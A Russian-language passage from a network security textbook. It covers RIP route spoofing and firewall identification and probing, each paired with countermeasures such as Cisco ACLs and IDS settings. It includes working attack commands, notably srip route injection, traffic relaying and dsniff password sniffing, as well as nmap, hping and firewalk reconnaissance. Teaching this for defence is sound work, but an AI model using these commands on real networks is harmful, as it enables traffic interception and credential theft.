    •  Если вы находитесь в том же физическом сегменте, что и маршрутизатор, и можете перехватывать сетевой трафик, то достаточно просто прослушать широковещательный трафик RIP и получить из него всю интересующую информацию о записях маршрутизации (если вы имеете дело с активным маршрутизатором RIP) или запросить маршруты (в случае пассивного или активного маршрутизатора RIP).
    •  Если вы находитесь на удаленном узле или лишены возможности перехватывать пакеты, то можно воспользоваться простой утилитой rprobe. Запустив эту утилиту в одном окне, можно передать маршрутизатору RIP запрос о доступных маршрутах:

    [roottt] rprobe -v 192.168.51.102
    Sending packet
    Sent 24 bytes.

    •  С помощью утилиты tcpdump (или другой программы перехвата пакетов), запущенной в другом окне, можно прочитать ответ маршрутизатора.

    ---- RIP Header----
    Routing data frame 1
    Address family identifier = 2 (IP)
    IP address = [10.42.33.0]
    Metric = 3
    Routing data frame 2
    Address family identifier = 2 (IP)
    IP address = [10.45.33.0]
    Metric = 3
    Routing data frame 2
    Address family identifier = 2 (IP)
    IP address = [10.45.33.0]
    Metric = 1

    3. Определите наилучшее направление атаки. Тип атаки ограничивается лишь фантазией взломщика, однако в данном примере мы перенаправим весь трафик на определенный узел через наш собственный компьютер, чтобы можно было проанализировать все пакеты и, не исключено, извлечь из них информацию о паролях. Для этого на маршрутизатор RIP (192.168.51.102) необходимо добавить следующий маршрут.
    IP-адрес = 10.45.33.10 
    Маска подсети =255.255.255.255
    Шлюз = 172.16.41.200 
    Метрика = 1
    4. Добавьте маршрут. Для этого с помощью утилиты srip передайте маршрутизатору ложный пакет со статическим маршрутом.
    [root#] srip -2 -n 255.255.255.255 172.16.41.200 192.168.51.102 10.45.33.10 1
    5. Теперь все пакеты, предназначенные для узла 10.45.33.1 (который может быть любым сервером, содержащим конфиденциальную информацию), будут перенаправляться на наш компьютер (172.16.41.200) для последующей передачи. Конечно, для дальнейшей передачи этих пакетов необходимо воспользоваться утилитой fragrouter или любым другим средством уровня ядра.

    Утилита fragrouter
    [root*] ./fragrouter -Bl
    Передача пакетов на уровне ядра
    [roottt] vi /proc/sys/net/ipv4/ip_forward (change 0 to 1)

    6. Установите свой любимый анализатор пакетов для системы Linux (например, программу dsnif f), а затем приступите к просмотру "на лету" имен пользователей и паролей.
    Как видно из следующего рисунка, обычный поток сообщений с узла DIANE можно без проблем перенаправить через компьютер взломщика (PAUL) и лишь затем передать их дальше на узел назначения (FRASIER).



     Контрмеры: защита от ложных пакетов RIP

    •  Запретите поддержку протокола RIP на своем маршрутизаторе. В протокол OSPF (Open Shortest Path First) встроены более защищенные механизмы аутентификации, которые ограничивают возможности взломщика по использованию ложных пакетов RIP.
    •  Если это возможно, вообще запретите на пограничном маршрутизаторе обработку входящих пакетов RIP (порты 521 TCP/UDP). Требуйте использования лишь статических маршрутов.



    8.gif

    Изображение: 

    9.gif

    Изображение: 

    12. Резюме



    Резюме


    В этой главе вы узнали, как много сетевых устройств можно выявить с помощью методов сканирования и прослеживания маршрутов. Идентифицировать эти устройства достаточно легко. Обычно этот процесс сопровождается сбором идентификационных маркеров, идентификацией операционной системы и идентификацией по характерным признакам, например по открытому порту 1999 устройств Cisco.
    Мы также обсудили угрозы, которые таит в себе неправильная настройка протокола SNMP и использование установленных по умолчанию строк доступа. Кроме того, мы рассмотрели различные потайные учетные записи, которые, к сожалению, имеются во многих современных сетевых устройствах. Затем мы остановились на нескольких способах получения конфигурационных файлов, таких как запись по сети базы данных Ml В или через TFTP.
    В этой главе были рассмотрены различия между коммутируемыми и традиционными сетями, а также продемонстрированы некоторые методы, с помощью которых злоумышленники могут прослушать сетевой поток данных telnet и SNMP с использованием анализаторов пакетов dsniff и linsniff, а затем получить доступ ко всей инфраструктуре сети. И наконец, был рассмотрен вопрос о том, как в коммутируемых сетях взломщики могут перехватывать пакеты ARP и использовать протоколы SNMP и RIP для обновления таблиц маршрутизации с целью последующего несанкционированного получения информации о пользователях.


    Глава 11. Брандмауэры



    Глава 11. БРАНДМАУЭРЫ




    1. Брандмауэры



    Брандмауэры


    С тех пор как Чесвик (Cheswick) и Белоувин (Bellovin) написали свой фундаментальный труд о построении брандмауэров и борьбе с коварным хакером Берфердом (Berferd), желание подключить Web-сервер (или любой другой компьютер) к Internet без развертывания брандмауэра считается самоубийством. Примерно то же можно сказать в ситуации, когда функции брандмауэра возлагаются на переносной компьютер сетевого администратора. Хотя таким опытным специалистам должны быть хорошо известны технические нюансы реализации брандмауэра, как правило, они совершенно не заботятся об обеспечении безопасности и не учитывают цели и средства коварных хакеров. В результате брандмауэры могут оказаться неправильно сконфигурированными, что позволяет взломщикам проникнуть в вашу сеть и послужить причиной далеко не самых лучших ощущений.


    2. Основные сведения



    Основные сведения



    На современном рынке преобладает два типа брандмауэров: программные посредники (application proxy) и шлюзы фильтрации пакетов (packet filtering gateways). Хотя программные посредники считаются более надежными, чем шлюзы фильтрации пакетов, их ограниченность и невысокая производительность обуславливают их применение в основном к исходящему трафику, а не к входящему потоку сообщений, поступающему на Web-серверы многих компаний. В то же время, шлюзы фильтрации пакетов или более сложные шлюзы с сохранением состояния (stateful) можно найти во многих крупных организациях, в которых высокие требования предъявляются к исходящему трафику.
    После появления первого брандмауэра они стали защищать многочисленные сети от глаз и нападок злоумышленников. Однако брандмауэры все же нельзя рассматривать как панацею от всех бед. Ежегодно новые слабые места обнаруживаются в системе защиты практически каждого брандмауэра, присутствующего на рынке. Что еще хуже, большинство брандмауэров зачастую неправильно настраивается, обслуживается и проверяется. В результате они становятся очень похожи на электронные ограничители, которые лишь не дают двери широко распахнуться, но все же оставляют небольшую щель для проникновения.
    Не вызывает никаких сомнений, что правильно разработанный, сконфигурированный и обслуживаемый брандмауэр является практически неуязвимым. Это известно многим опытным злоумышленникам, которые стремятся обойти такие брандмауэры и воспользоваться доверительными отношениями, уязвимыми линиями связи или вообще прибегнуть к нападению через учетную запись удаленного доступа. Из всего вышесказанного можно сделать лишь один вывод: большинство взломщиков предпочитают обойти надежный брандмауэр. Поэтому необходимо позаботиться о его надежности.
    Что же касается самих администраторов, то они должны хорошо представлять своих противников и их возможности. Очень важно знать о том, какие первые шаги предпримет злоумышленник для обхода брандмауэра, чтобы вовремя выявить подобную деятельность и предотвратить нападение. В этой главе будут рассмотрены типичные приемы, используемые в настоящее время для исследования и инвентаризации брандмауэров, а также несколько методов, которыми могут воспользоваться взломщики для их обхода. Кроме того, вы узнаете о том, как выявить и предотвратить каждую из подобных атак.


    3. Идентификация брандмауэров



    Идентификация брандмауэров


    Почти каждый брандмауэр имеет свои отличительные особенности. Поэтому с помощью сканирования портов, инвентаризации и сбора идентификационных маркеров взломщики могут правильно определить тип, версию и набор правил практически каждого брандмауэра в сети. Почему так важна подобная идентификация? Как только вся эта информация будет получена, взломщик может приступать к ее анализу, поиску уязвимых мест и дальнейшему их использованию.

    Прямое сканирование



    Самый простой способ поиска брандмауэров заключается в сканировании определенных портов, используемых ими по умолчанию. Некоторые современные брандмауэры можно уникально идентифицировать, выполнив простое сканирование портов. Для этого необходимо лишь знать, что именно вы хотите найти. Например, брандмауэры Firewall-1 компании Checkpoint ожидают поступления запросов с TCP-портов 256, 257 и 258, a Proxy Server компании Microsoft обычно прослушивает TCP-порты с номерами 1080 и 1745. Обладая такой информацией, поиск этих типов брандмауэров окажется тривиальным, если воспользоваться сканером портов, таким как утилита nmap.
    nmap -n -vv -P0 -p256,1080,1745 192.168.50.1-60.254
    Параметр -P0 отключает передачу тестовых ICMP-пакетов перед сканированием. Это оказывается очень важным, поскольку многие брандмауэры не реагируют на поступающие эхо-запросы ICMP.
    Чтобы найти все бреши в защите пограничных устройств вашей сети, как начинающий, так и опытный взломщик прибегнет к сканированию широкого диапазона портов. Однако наиболее опасные злоумышленники постараются выполнить сканирование как можно более незаметно. При этом для того чтобы избежать разоблачения, они могут воспользоваться любым из многочисленных приемов, включая ping-прослушивание случайно выбранных адресов, произвольных портов, а также использование ложных узлов и выполнение распределенного сканирования.
     Если вы надеетесь, что система выявления вторжений (IDS - Intrusion -> Detection System) сможет выявить подобные атаки, то оцените потенциальную опасность еще раз. Большинство систем IDS настроено таким образом, что они способны обнаружить лишь наиболее "шумное" или прямолинейное сканирование портов. Если систему IDS не настроить должным образом, большинство злоумышленников останутся абсолютно незамеченными. Сканирование произвольных портов можно реализовать с помощью сценария Perl.

    Контрмеры: защита от прямого сканирования



    Способы предотвращения сканирования портов брандмауэра во многом совпадают с методами, рассмотренными в главе 2. Необходимо заблокировать попытки такого сканирования на пограничном маршрутизаторе или воспользоваться одним из средств выявления вторжений (свободно распространяемым или коммерческим). Однако и в этом случае нельзя предотвратить простое сканирование портов, поскольку по умолчанию большинство систем IDS не позволяет обнаружить подобную деятельность. Так что перед их использованием необходимо выполнить соответствующую настройку.

    Обнаружение



    Для того чтобы безошибочно обнаружить факт сканирования портов по случайному закону или с применением ложных узлов, нужно тонко настроить соответствующую сигнатуру. Для получения дополнительной информации по этому вопросу внимательно изучите документацию, входящую в комплект поставки используемой системы IDS.
    Для того чтобы обнаружить сканирование портов из предыдущего примера с использованием системы RealSecure 3.0, нужно дополнительно повысить ее чувствительность, модифицировав специальные параметры. Мы рекомендуем внести следующие изменения.
    1. Выберите и настройте политику Network Engine Policy.
    2. Выберите команду Port Scan и щелкните на кнопке Options.
    3. В поле Ports внесите значение 5.
    4. В поле Delta задайте интервал 60 секунд.
    При использовании брандмауэра Firewall-1 системы UNIX для выявления попыток сканирования можно воспользоваться утилитой Ланца Спитзнера. Как упоминалось в главе 2, его сценарий alert.sh поможет настроить брандмауэр компании Checkpoint и осуществить мониторинг сканирования портов, а при обнаружении такой деятельности будет сгенерировано уведомление, установленное пользователем.

    Предотвращение



    Для того чтобы предотвратить сканирование портов брандмауэра из Internet, нужно заблокировать эти порты на маршрутизаторе, расположенном перед брандмауэром. Если эти устройства управляются вашим провайдером услуг Internet, то этот вопрос придется согласовать с ним. Если же вы самостоятельно управляете маршрутизатором, то для явного блокирования попыток сканирования воспользуйтесь следующим списком ACL компании Cisco.

    access-list 101 deny tcp any any eq 256 log!
    Блокирование сканирования Firewall-1
    access-list 101 deny tcp any any eq 257 log!
    Блокирование сканирования Firewall-1
    access-list 101 deny tcp any any eq 258 log!
    Блокирование сканирования Firewall-1
    access-list 101 deny tcp any any eq 1080 log!
    Блокирование сканирования Socks
    access-list 101 deny tcp any any eq 1745 log!
    Блокирование сканирования Winsock

    Если вы заблокируете порты Checkpoint (256-258) на пограничных маршрутизаторах, то не сможете управлять брандмауэром по Internet. Администратор Cisco может без особых проблем применить вышеперечисленные правила. Нужно просто перейти в режим редактирования параметров и ввести по очереди предыдущие строки. После этого необходимо выйти из режима редактирования и ввести команду write, чтобы внесенные изменения были внесены в конфигурационный файл.

    Кроме того, на всех маршрутизаторах в любом случае должно быть задано правило очистки (если они не препятствуют поступлению пакетов по умолчанию), которое имеет тот же смысл, что и приведенная ниже операция.

    access-list 101 deny ip any any log!
    Запрещение и регистрация любого пакета, удовлетворяющего приведенному списку ACL

    Отслеживание маршрута



    Более скрытый и изощренный метод поиска брандмауэров в сети заключается в использовании утилиты traceroute. Для поиска каждого сегмента пути к целевому узлу можно воспользоваться утилитой traceroute системы UNIX или аналогичной утилитой tracert.exe системы NT. Затем на основании полученной информации можно сделать некоторые логические предположения. В версии утилиты traceroute из системы Linux имеется параметр -I, при указании которого для поиска сегментов будут посылаться пакеты ICMP, а не UDP-пакеты, используемые по умолчанию.

    [sm]$ traceroute -I 192.168.51.100
    traceroute to 192.168.51.101 (192.168.51.100), 30 hops max, 40 byte
    packets
    1 attack-gw (192.168.50.21) 5.801 ms 5.105 ms 5.445 ms
    2 gwl.smallisp.net (192.168.51.1)
    3 gw2.smallisp.net (192.168.52.2)
    13 hssi.bigisp.net (10.55.201.2)
    14 seriall.bigisp.net (10.55.202.1)
    15 192.168.51.101 (192.168.51.100)

    Особого внимания заслуживает сегмент, предшествующий целевому узлу (10. 55.202 .1). Почти наверняка по этому адресу находится брандмауэр, однако для полной уверенности в этом необходимо выполнить некоторые дополнительные исследования.
    Предыдущая команда предоставит большое количество информации, если маршрутизатор, расположенный между целевым сервером и компьютером взломщика, отвечает на пакеты, время жизни которых, определяемое значением TTL (Time-To-Live), истекло. Однако некоторые маршрутизаторы и брандмауэры настроены таким образом, что они не возвращают lCMP-пакеты в ответ на поступившие ICMP- и UDP-пакеты с истекшим временем TTL. Все, что в данном случае можно сделать, — это воспользоваться утилитой traceroute и посмотреть на последний сегмент полученного маршрута. Этот узел может оказаться полнофункциональным брандмауэром или, как минимум, первым маршутизатором пути, с которого началось блокирование пакетов с истекшим временем TTL. В приведенном ниже примере произошло блокирование передачи ICMP-пакетов источнику назначения. Как следствие, данные о маршрутизаторах, расположенных на пути к целевому узлу дальше маршрутизатора client-gw.smallisp.net, в полученной информации отсутствуют.

    1 stoneface (192.168.10.33) 12.640 ms 8.367 ms
    2 gwl.localisp.net (172.31.10.1) 214.582 ms 197.992 ms
    3 gw2.localisp.net (172.31.10.2) 2C6.627 ms 38.931 ms
    4 dsl.localisp.net (172.31.12.254) 47.167 ms 52.640 ms
    14 ATM6.LAX2.BIGISP.NET (10.50.2.1) 250.030 ms 391.716 ms
    15 ATM7.SDG.BIGISP.NET (10.50.2.5) 234.668 ms 384.525 ms
    16 client~gw.smallisp.net (10.50.3.250) 244.065 ms!X * *
    17 * * *
    18 * * *

    Контрмеры: защита от отслеживания маршрута



    Для того чтобы предотвратить получение информации с помощью утилиты traceroute, запретите передачу ответных пакетов на пакеты с истекшим временем TTL на всех брандмауэрах и маршрутизаторах, на которых это возможно. Однако помните о том, что полностью решить этот вопрос можно далеко не всегда, поскольку многие маршрутизаторы могут оказаться под управлениям вашего провайдера услуг Internet.

    Обнаружение



    Попытки получения маршрутов с использованием стандартных средств можно выявить на границах сети в процессе мониторинга ICMP- и UDP-пакетов со значением TTL, равным 1. Это можно осуществить с помощью пакета RealSecure 3.0, выбрав имя TRACE_ ROUTE среди параметров безопасности Security Events политики Network Engine Policy.

    Предотвращение



    Для того чтобы предотвратить возможность отслеживания маршрутов на границе сети, маршрутизаторы необходимо настроить таким образом, чтобы они не отправляли пакеты в ответ на сообщения с временем TTL, равным 0 или 1. На маршрутизаторах Cisco для этого можно воспользоваться следующим списком ACL. access-list 101 deny ip any any 11 0 ! Время ttl истекло
    Однако лучше всего полностью заблокировать передачу пакетов UDP на пограничных маршрутизаторах.

    Сбор маркеров



    Сканирование портов позволяет определить местоположение брандмауэров, однако многие из них, подобно продуктам компаний Checkpoint и Microsoft, не прослушивают порты, установленные по умолчанию. Так что для подтверждения имеющихся сведений требуется получить дополнительные данные. В главе 3 подробно рассматривались методы получения имен запущенных приложений и их версий. Для этого необходимо подключиться к активным службам и извлечь связанные с ними идентификационные маркеры. Многие популярные брандмауэры предоставляют всю необходимую информацию сразу же после установки с ними соединения. Многие промежуточные узлы информируют злоумышленника о том, что они являются брандмауэрами, а некоторые из них дополнительно сообщают свой тип, а также версию. Например, при подключении с помощью утилиты netcat к порту 21 (FTP) узла, который, очевидно, является брандмауэром, можно получить некоторую важную информацию.

    C:\>nc -v -n 192.168.51.129 21
    (UNKNOWN) [192.168.51.129] 21 (?) open
    220 Secure Gateway FTP server ready.

    Сообщение Secure Gateway FTP server ready позволяет сделать вывод о том, что мы имеем дело со старым устройством Eagle Raptor. Последующее подключение к порту 23 (telnet) предоставляет еще одно доказательство этого предположения.

    C:\>nc -v -n 192.168.51.129 23
    (UNKNOWN) [192.168.51.129] 23 (?) open
    Eagle Secure Gateway.
    Hostname:

    И наконец, если вы все еще не совсем уверены в том, что исследуемый узел является брандмауэром, можно подключиться с помощью утилиты netcat к порту 25 (SMTP). После этого все сомнения рассеются окончательно.

    C:\>nc -v -n 192.168.51.129 25
    (UNKNOWN) [192.168.51.129] 25 (?) open
    421 fw3.acme.com Sorry, the firewall does not
    provide mail service to you.

    Как видно из приведенных примеров, в процессе идентификации брандмауэров чрезвычайно важной может оказаться информация о маркерах. После ее анализа можно воспользоваться хорошо известными изъянами или широко распространенными ошибками в настройке.

    Контрмеры: защита от сбора маркеров



    Для того чтобы избежать утечки информации, необходимо ограничить количество данных, предоставляемых по внешним запросам. К каждому маркеру можно добавить также сообщение о юридической ответственности, а, кроме того, все попытки получения этой информации должны регистрироваться в системных журналах. Специфика изменения маркеров, используемых по умолчанию, сильно зависит от типа используемого брандмауэра, так что перед выполнением подобных действий внимательно прочтите документацию или проконсультируйтесь с производителем.

    Предотвращение



    Для того чтобы предотвратить возможность сбора маркеров злоумышленником и, как следствие, получение им подробной информации о брандмауэре, можно изменить соответствующие конфигурационные файлы. Конкретные рекомендации зависят от типа брандмауэра. Например, для брандмауэров Eagle Raptor можно модифицировать маркеры FTP и telnet, изменив файлы сообщений с событиями дня (message-of-the day) ftp.motd и telnet.motd.


    4. Дополнительное исследование брандмауэров



    Дополнительное исследование брандмауэров


    Если прямое сканирование портов, отслеживание маршрутов и сбор маркеров не принесли успеха, взломщики могут прибегнуть к дополнительной инвентаризации брандмауэра на более высоком уровне. При этом идентифицировать брандмауэры и получить их правила ACL можно в процессе исследования цели и анализа полученной информации (или не полученной).

    Простой способ получения данных с помощью утилиты nmар



    Утилита nmар является прекрасным средством исследования брандмауэров, и мы постоянно ею пользуемся. В процессе сканирования узла эта утилита сообщает не только об открытых или закрытых портах, но и о тех из них, которые оказались заблокированными. При этом полученные (или отсутствующие) данные позволяют узнать о конфигурации брандмауэра много важной информации.
    Если в результате сканирования утилита nmap "пометила" порт как фильтруемый, то это означает возникновение одного из следующих условий.

    • Не получен пакет SYN/ACK. 
    • Не получен пакет RST/ACK.
    • Получено ICMP-сообщение типа 3 (Destination Unreachable) с кодом 13 (Communication Administratively Prohibited — RFC 1812).

    При выполнении любого из этих трех условий утилита nmap сообщит о порте как о фильтруемом (filtered). Например, при сканировании узла www.company.com мы получили два IСМР-пакета, что говорит о блокировании брандмауэром портов 23 и 111.

    [root]# nmap -p20,21,23,53,80,111 -PO -w 192.168.51.100
    Starting nmap V.2.08 by Fyodor (fyodor@dhp.com,
    www.insecure.org/nmap/)
    Initiating TCP connect() scan against (192.168.51.100)
    Adding TCP port 53 (state Open).
    Adding TCP port 111 (state Firewalled).
    Adding TCP port 80 (state Open).
    Adding TCP port 23 (state Firewalled).
    Interesting ports on (192.168.51.100):
    Port State Protocol Service
    23 filtered tcp telnet
    53 open tcp domain
    80 open tcp http
    111 filtered tcp sunrpc

    Состояние Firewalled из предыдущего фрагмента свидетельствует о получении 1СМР-пакета типа 3 с кодом 13 (admin prohibited filter), как видно из следующего листинга утилиты tcpdump.

    23:14:01.229743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4
    Unreachable - admin prohibited filter
    23:14:01.979743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4
    Unreachable - admin prohibited filter

    Каким же образом утилите nmap удается связать получаемые пакеты с исходными сообщениями, особенно, когда они являются лишь малой частью данных, передаваемых по сети? Дело в том, что в ответном ICMP-пакете, передаваемом на сканирующий узел, содержится вся информация, необходимая для понимания того, что же произошло. О блокировании порта сообщается в однобайтовом блоке заголовка IСМР по адресу 0x41, а в случае обращения к фильтруемому порту брандмауэр отправит сообщение в IP-блоке пакета по адресу 0xlb (4 байта).
    И наконец, о нефильтруемых (unf iltered) портах утилита nmap сообщает лишь в том случае, когда при их сканировании обратно возвращается пакет RST/ACK. В этом случае тестовый пакет либо достигает целевого узла, который сообщает о том, что порт не находится в состоянии ожидания запросов, либо брандмауэр имитирует IP-адрес этого узла, устанавливая флаг RST/ACK. Например, при сканировании локальной системы было выявлено два нефильтруемых порта, поскольку не пришло двух ответных пакетов RST/ACK. Подобная ситуация может быть имитирована и некоторыми брандмауэрами, например, ChackPoint на которых действует правило REJECT.

    [root]# nmap -sS -pl-300 172.18.20.55
    Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com,
    www.insecure.org/nmap/)
    Interesting ports on (172.18.20.55):
    (Not showing ports in state: filtered)
    Port State Protocol Service
    7 unfiltered tcp echo
    53 unfiltered tcp domain
    256 open tcp rap
    257 open tcp set
    258 open tcp yak-chat
    Nmap run completed -- 1 IP address
    (1 host up) scanned in 15 seconds

    При отслеживании пакетов с помощью утилиты tcpdump можно увидеть, что обратно возвращаются пакеты RST/ACK.

    21:26:22.742482 172.18.20.55.258 > 172.29.11.207.39667: S
    415920470:1415920470(0) ack 3963453111 win 9112 <mss 536> (DF)
    (ttl 254, id 50438)
    21:26:23.282482 172.18.20.55.53 > 172.29.11.207.39667:
    R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50439) 21:26:24.362482

    172.18.20.55.257 > 172.29.11.207.39667: S 1416174328:1416174328(0)
    ack 3963453111 win 9112 <mss 536>
    (DF) (ttl 254, id 50440)
    21:26:26.282482 172.18.20.55.7 > 172.29.11.207.39667:
    R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50441)

    Контрмеры против применения утилиты nmар


    Обнаружение



    Для выявления попыток сканирования с использованием утилиты nmap можно применять подходы, описанные в главе 2. Кроме того, можно также дать следующий совет. Настройте процедуру обнаружения сканирования таким образом, чтобы отдельно получать информацию о попытках сканирования брандмауэров.

    Предотвращение



    Для того чтобы предотвратить возможность инвентаризации списков ACL маршрутизаторов и брандмауэров, нужно отключить на них режим передачи ответных сообщений ICMP с типом 13. На маршрутизаторах Cisco это можно осуществить, запретив передачу ответных IP-сообщений о недостижимости цели. no ip unreachables

    Идентификация портов



    Некоторые брандмауэры имеют уникальные характеристики, отличающие их от других брандмауэров и представленные в виде последовательности цифр. Например, такую последовательность можно получить при подключении к TCP-порту 257 (SNMP) брандмауэров Checkpoint. Наличие портов 256-259 является хорошим признаком брандмауэра Firewall-1 компании Checkpoint. А следующий тест поможет в этом удостовериться.

    [root]# nc -v -n 192.168.51.1 257
    (UNKNOWN) [192.168.51.1] 257 (?)
    open
    30000003
    [root]# no -v -n 172.29.11.191 257
    (UNKNOWN) [172.29.11.191] 257 (?)
    open 31000000

    Контрмеры: защита от идентификации портов


    Обнаружение



    Факт подключения злоумышленника к портам можно выявить, добавив аудит соответствующего события в программе RealSecure. Вот что для этого нужно сделать.
    1. Активизируйте режим редактирования политики.
    2. Перейдите во вкладку Connection Events.
    3. Щелкните на кнопке Add Connection и введите параметры записи, соответствующие брандмауэру Checkpoint.
    4. Выберите диапазон портов и щелкните на кнопке Add.
    5. Введите значения в поля службы и порта, а затем щелкните на кнопке ОК.
    6. Выберите новый порт и снова щелкните на кнопке ОК.
    7. Щелкните на кнопке ОК, чтобы применить политику с измененными параметрами.

    Предотвращение



    Возможность подключения к TCP-порту можно предотвратить, заблокировав его на маршрутизаторе исходящих сообщений. Следующий простой список ACL брандмауэров Cisco поможет явно запретить все попытки подключения. access-list 101 deny tcp any any eq 257 log ! Блокирование сканирования Firewall-1


    5. Война с брандмауэрами



    Война с брандмауэрами


    Не волнуйтесь, в данном разделе мы Не будем рассматривать чудодейственные способы вывода из строя действующих брандмауэров. Мы лишь познакомимся с несколькими приемами, которые позволяют собрать некоторую важную информацию о различных путях проникновения через брандмауэры и их обхода.

    Передача тестовых пакетов



    Утилита hping, написанная Сальватором Санфилиппо (Salvatore Sanfilippo), передает TCP-пакеты на порт назначения и сообщает о том, какие ответные пакеты были получены. В зависимости от многочисленных условий эта утилита предоставляет самые разнообразные сведения. Каждый отдельный пакет и все пакеты в целом способны предоставить довольно ясное представление об используемых на брандмауэрах списках управления доступом. Например, с помощью утилиты hping можно выявить открытые и заблокированные порты, а также потерянные и отвергнутые пакеты.
    В следующем примере утилита hping сообщила о том, что открыт порт 80, который готов установить соединение. Такое заключение можно сделать на основании того, что мы получили пакет с установленным флагом SA (пакет SYN/ACK).

    [root]# hping 192.168.51.101 -с2 -S -р80 -n
    HPING www.yourcomapany.com (ethO 172.30.1.20): S set, 40 data bytes
    60 bytes from 172.30.1.20: flags=SA seq=0 ttl=242 id=65121 win=64240
    time=144.4 ms

    Теперь нам известен открытый порт на пути к желанной цели, однако мы еще ничего не знаем о брандмауэре. В следующем примере утилита hping сообщает о том. что с узла 192.168.70.2 ею получен ICMP-пакет типа 13 (Destination Unreachable — получатель недостижим). В главе 2 упоминалось, что такой пакет обычно передается маршрутизатором с фильтрацией пакетов типа Cisco IOS, на котором взаимодействие с определенными портами административно запрещено.

    [root]# hping 192.168.51.101 -с2 -S -p23 -n
    HPING 192.168.51.101 (ethO 172.30.1.20): S set, 40 data bytes
    ICMP Unreachable type 13 from 192.168.70.2

    С этого момента наше предположение подтвердилось: узел 172.168.70.2, скорее всего, является брандмауэром. Кроме того, нам известно, что на нем явно блокируется порт 23. Другими словами, если узел представляет собой маршрутизатор Cisco, то в его конфигурационном файле наверняка имеется следующая строка.

    access-list 101 deny tcp any any 23!telnet

    В приведенном ниже примере мы получили ответный пакет RST/ACK, что свидетельствует о выполнении одного из двух возможных условий: (1) пакет прошел через брандмауэр и на целевом узле заданный порт не находится в состоянии ожидания запросов или (2) брандмауэр отверг пакет (что вполне возможно, если на брандмауэре Checkpoint действует правило REJECT).

    [root]# hping 192.168.50.3 -с2 -S -p22 -n
    HPING 192.168.50.3 (ethO 192.168.50.3): S set, 40 data bytes
    60 bytes from 192.168.50.3:flags=RA
    seq=0 ttl=59 id=0 win=0 time=0.3 ms

    Поскольку ранее был получен ICMP-пакет типа 13, можно сделать вывод о том, что брандмауэр (192.168.70.2) позволяет пакетам проходить дальше по маршруту, однако на целевом узле опрашиваемый порт не находится в состоянии ожидания запросов.
    Если при сканировании портов на пути к цели оказался брандмауэр Checkpoint, то утилита hping сообщит IP-адрес целевого узла, однако на самом деле пакет будет отправлен с внешнего сетевого адаптера брандмауэра CheckPoint. В данном случае хитрость заключается в том, что брандмауэр CheckPoint генерирует ответный пакет вместо внутреннего узла, помещая в этот пакет его ложный адрес. Однако если взломщик столкнется с подобной ситуацией в Internet, то ему никогда не удастся узнать об этом, поскольку на его компьютер МАС-адрес никогда не попадет.
    И наконец, если брандмауэр вообще блокирует пакеты, передаваемые на заданный порт, как правило, в ответ не будет получено никакой информации.

    [root]# hping 192.168.50.3 -с2 -S -p22 -n
    HPING 192.168.50.3 (ethO 192.168.50.3): S set,40 data bytes

    Такой результат утилита hping может предоставить по двум причинам: (1) пакет не смог достичь источника назначения и был утерян в процессе передачи или (2) наиболее вероятно, пакет был отброшен устройством (возможно, брандмауэром — 192 .168. 70.2) в соответствии с установленными правилами ACL.

     Контрмеры: защита от тестовых пакетов


    Предотвращение



    Предотвратить атаки с использованием утилиты hping очень трудно. Лучше всего просто заблокировать передачу сообщений ICMP с типом 13 (как описано в разделе, посвященному утилите nmap).

    Утилита firewalk



    Утилита firewalk является небольшим прекрасным средством, которое, подобно программам-сканнерам, позволяет исследовать порты узлов, расположенных позади брандмауэра. Она написана Майком Шифманом (Mike Schiffman) и Дэйвом Гольдсмитом (Dave Goldsmith). С помощью этой утилиты можно просканировать такие узлы и получить установленные на них правила. Причем вся процедура выполняется без реального "прикосновения" к целевой системе.
    Утилита firewalk генерирует IP-пакеты с параметром TTL, который вычисляется так, чтобы время жизни пакета истекло в следующем за брандмауэром сегменте маршрута. Теоретические предпосылки такого подхода заключаются в том, что если пакет пропускается брандмауэром, то по истечении времени его жизни будет получено сообщение ICMP TTL, expired in transit (время жизни истекло в процессе передачи). В то же время, если пакет блокируется на основании заданного списка ACL брандмауэра, то этот пакет будет отвергнут. В результате либо вообще не будет получено никакого ответного сообщения, либо будет получен ICMP-пакет с типом 13.

    [root]# firewalk -pTCP -S135-140 10.22.3.1
    192.168.1.1

    Ramping up hopcounts to binding host...
    probe: 1 TTL: 1 port 33434: expired from [exposed.acme.com]
    probe: 2 TTL: 2 port 33434: expired from [rtr.isp.net]
    probe: 3 TTL: 3 port 33434: Bound scan at 3 hops [rtr.isp.net]
    port 135: open
    port 136: open
    port 137: open
    port 138: open
    port 139: *
    port 140: open

    Относительно утилиты firewalk необходимо упомянуть об одной проблеме, которая заключается в том, что ее результаты могут оказаться непредсказуемыми. Некоторые брандмауэры способны выявить истечение времени жизни пакета до проверки своего списка ACL, что приводит к передаче ответного ICMP-сообшения TTL EXPIRED в любом случае. В результате утилитой firewalk все порты будут считаться открытыми.

    Контрмеры: защита от утилиты firewalk


    Предотвращение



    На уровне внешнего интерфейса можно заблокировать передачу ICMP-пакетов TTL EXPIRED, однако это может отрицательно сказаться на производительности, поскольку легитимные клиенты никогда не смогут узнать, что же произошло с их соединением.

    Сканирование с исходного порта



    Традиционные брандмауэры с фильтрацией пакетов типа IOS Cisco имеют один существенный недостаток: они не сохраняют состояние! Для большинства читателей этот факт выглядит вполне очевидным, не так ли? Однако проанализируйте его еше раз. Если брандмауэр не может поддерживать состояние, то он не может определить, с внутренней или с внешней стороны было установлено соединение. Другими словами, такие брандмауэры не могут полностью управлять некоторыми потоками данных. Как следствие, в качестве исходного можно задать порт, который обычно является "легитимным", например TCP 53 (перенос зоны) и TCP 20 (FTP), а затем для получения ценной информации приступить к сканированию (или к атаке).
    Для того чтобы определить, позволяет ли брандмауэр выполнять сканирование с заданного исходного порта 20 (канала данных FTP), воспользуйтесь утилитой nmap с параметром -д.
    nmap -sS -Р0 -д 20 -р 139 10.1.1.1
    При задании статического исходного порта в качестве параметра утилиты шпар необходимо воспользоваться методом сканирования с неполным открытием сеанса или с использованием сообщений SYN.
    Если сканируемые порты оказались открытыми, то, очевидно, вы имеете дело с уязвимым брандмауэром, который расположен между вашим компьютером и целевым узлом. Для лучшего понимания описываемого процесса проанатазируйте приведенную ниже диаграмму.


